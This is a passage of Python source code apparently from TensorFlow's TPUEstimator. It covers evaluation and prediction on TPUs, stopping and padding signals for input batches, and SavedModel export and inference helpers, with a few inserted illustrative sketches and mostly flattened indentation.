compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
if self._embedding_from_feature_columns:
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
else:
embedding_variable_name_by_table = None
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
          # scaffold_fn must be called after the variables for TPU embedding have
          # been created on CPU, as the user might reinitialize them from some
          # checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
            # After the TPU evaluation computation is done (the mean_loss tensor),
            # read all variables back from the TPU and update the eval step
            # counter properly.
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
            # Creates a dummy metric update_op for all metrics. Estimator
            # expects all metrics in `eval_metric_ops` to have an update_op and
            # calls them one by one. The real metric update_ops are invoked in a
            # separate thread. So, here we give Estimator the dummy op for all
            # metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
            # If no eval metrics are passed, create an identity node for the
            # loss and add `internal_ops_to_run` to its dependencies, so that
            # `internal_ops_to_run` can still be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
        # directly and yields the element (via a generator) to the call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
        # to form a single invocation. This avoids the issue that we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
          host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
        '`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
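# Illustrative sketch, not part of the original module: the flatten/rebuild
# round trip that the two helpers above enable, shown with plain Python
# containers instead of real `ExportOutput` objects.
# `_example_export_output_roundtrip` is a hypothetical name used only here.
def _example_export_output_roundtrip():
  outputs = {'scores': [0.1, 0.9], 'classes': ['a', 'b']}
  # Flatten the outputs to an ordered list of values (what
  # `_export_output_to_tensors` does for `PredictOutput`), post-process them,
  # then zip them back by key (what `_clone_export_output_with_tensors` does).
  keys = list(outputs.keys())
  processed = [outputs[k] for k in keys]  # stand-in for TPU->CPU rewritten tensors
  return dict(zip(keys, processed))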
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
outputs = training_loop.while_loop(
lambda i, loss : i < iterations_per_loop_var,
lambda i, loss : [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = ops.get_default_graph().get_operations()
  # Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
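# Illustrative sketch, not part of the original module: `_CapturedObject` lets a
# control-flow body function hand an object back to the caller after the body
# has run. The function name `_example_captured_object_usage` is hypothetical.
def _example_captured_object_usage():
  capture = _CapturedObject()
  def _body():
    # Built inside the control-flow body; captured for use outside of it.
    capture.capture('scaffold-built-inside-body')
  _body()
  return capture.get()  # -> 'scaffold-built-inside-body'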
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
        # when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
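# Illustrative sketch, not part of the original module: the padded-batch
# schedule described in `_InputsWithStoppingSignals.__init__`. With n
# invocations per training step, 2 * n - 1 stop batches are enough to fill the
# partial final step and still leave one full step made purely of stop batches.
# `_example_stop_batch_count` is a hypothetical helper used only for this sketch.
def _example_stop_batch_count(num_invocations_per_step):
  if num_invocations_per_step == 1:
    return 1
  return 2 * num_invocations_per_step - 1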
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
    # order is preserved. Given that, the sliced padding mask should have all 0's.
    # If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
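# Illustrative sketch, not part of the original module: the pad-and-mask idea
# above using NumPy only. Rows past the real batch are zero-padded and the mask
# marks them with 1 so they can be sliced away after the TPU round trip.
# `_example_pad_batch` is a hypothetical helper; it assumes `features` is a
# single ndarray rather than a nested structure.
def _example_pad_batch(features, batch_size):
  real_batch_size = features.shape[0]
  missing_count = batch_size - real_batch_size
  padded = np.pad(
      features, [(0, missing_count)] + [(0, 0)] * (features.ndim - 1),
      mode='constant')
  padding_mask = np.concatenate([
      np.zeros((real_batch_size,), dtype=np.int32),
      np.ones((missing_count,), dtype=np.int32)
  ], axis=0)
  return padded, padding_mask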
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
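# Illustrative sketch, not part of the original module: the per-tensor size
# estimate used in the check above, for a single statically known shape.
# `_example_tensor_bytes` is a hypothetical helper; e.g. a (1024, 1024) float32
# tensor is 1024 * 1024 * 4 bytes = 4 MiB.
def _example_tensor_bytes(shape, dtype_size_bytes):
  return int(np.prod(shape)) * dtype_size_bytes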
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
  using inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(
features,
computation,
batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn,
labels,
config,
params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
    # Makes a deep copy of `config` and `params` in case the user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
